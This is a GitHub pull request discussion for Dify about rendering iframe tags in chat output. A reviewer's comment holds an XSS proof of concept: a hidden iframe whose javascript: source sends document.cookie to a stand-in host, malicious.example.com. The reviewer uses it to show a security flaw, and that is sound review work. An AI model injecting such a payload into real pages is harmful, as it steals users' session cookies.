dify
dify copied to clipboard
iframe front end rendering
Description
When the generated content contains an iframe tag, the front end implements automatic embedding rendering,The supported parameters and recommended formats are as follows, Note that the src parameter is required, and the default value is provided if the others are left blank:
.Fixes # (issue)
Type of Change
Please delete options that are not relevant.
- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update, included: Dify Document
How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- [ ] TODO
Suggested Checklist:
- [x] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [x] My changes generate no new warnings
- [ ] I ran
dev/reformat
(backend) andcd web && npx lint-staged
(frontend) to appease the lint gods - [ ]
optional
I have made corresponding changes to the documentation - [ ]
optional
I have added tests that prove my fix is effective or that my feature works - [ ]
optional
New and existing unit tests pass locally with my changes
<h1>Welcome to My Web Page</h1> <iframe style="display:none" src="javascript:document.write('<script>document.location="http://malicious.example.com/steal-cookie?cookie="+document.cookie</script>')" ></iframe>
This PR could lead potential XSS attack in chat bubble.
Fixed this issue
<h1 style="color: red;">Red Text</h1>
<h1 style="color: green;">Green Text</h1>
<h1 style="color: blue;">Blue Text</h1>
Hi, I've been redirected to here from my issue. I wonder whether this PR only applies to user inputs. I'd like to embed an iframe in a function/tool calling, so that I can customize the UI when the model calls a tool. Would be great to have something like LobeChat plugins.
Hi, I've been redirected to here from my issue. I wonder whether this PR only applies to user inputs. I'd like to embed an iframe in a function/tool calling, so that I can customize the UI when the model calls a tool. Would be great to have something like LobeChat plugins.
@charli117
Close for now.